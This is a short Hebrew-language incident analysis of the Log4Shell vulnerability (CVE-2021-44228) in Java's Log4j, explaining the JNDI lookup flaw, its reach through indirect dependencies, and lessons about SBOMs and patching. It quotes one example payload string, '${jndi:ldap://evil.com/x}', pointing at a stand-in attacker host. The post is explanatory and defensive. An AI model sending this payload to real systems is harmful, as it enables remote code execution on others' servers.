ניתוח אירוע: Log4Shell — החולשה ששיתקה את האינטרנט (CVE-2021-44228)

בדצמבר 2021 העולם הטכנולוגי עצר את הנשימה. חולשה במנגנון תיעוד (logging) נפוץ ב-Java בשם Log4j קיבלה ציון CVSS של 10.0 — המקסימום.

מה קרה?

Log4j אפשרה "תחליפים" (lookups) בתוך הודעות לוג. תוקף יכל לשלוח מחרוזת תמימה-לכאורה כמו ${jndi:ldap://evil.com/x} — ואם היא נכתבה ללוג, השרת היה מוריד ומריץ קוד מהשרת של התוקף. שורה אחת = הרצת קוד מרחוק (RCE).

למה זה היה כל כך נורא?

Log4j נמצאת בעשרות אלפי יישומי Java — שרתים, מצלמות, שירותי ענן, אפילו Minecraft. רוב הארגונים לא ידעו בכלל שהיא אצלם (תלות עקיפה).

🔍 תובנות / מה למדנו

1. שרשרת אספקה = משטח תקיפה. אתם פגיעים לרכיבים שלא ידעתם שאתם משתמשים בהם.
2. SBOM זה לא בירוקרטיה — זה הצלה. מי שהחזיק רשימת רכיבים מעודכנת ידע בדקות אם הוא חשוף; השאר חיפשו ימים.
3. קלט משתמש מסוכן בכל מקום — גם בלוג. מקום שאף אחד לא חשב עליו כ"קלט".
4. תיקון מהיר דורש היכרות מראש. ארגונים שידעו מה רץ אצלם תיקנו מהר; השאר נחשפו.

הלקח הגדול: עדכונים ומיפוי תלויות זה "משעמם" — עד שמגיע Log4Shell הבא.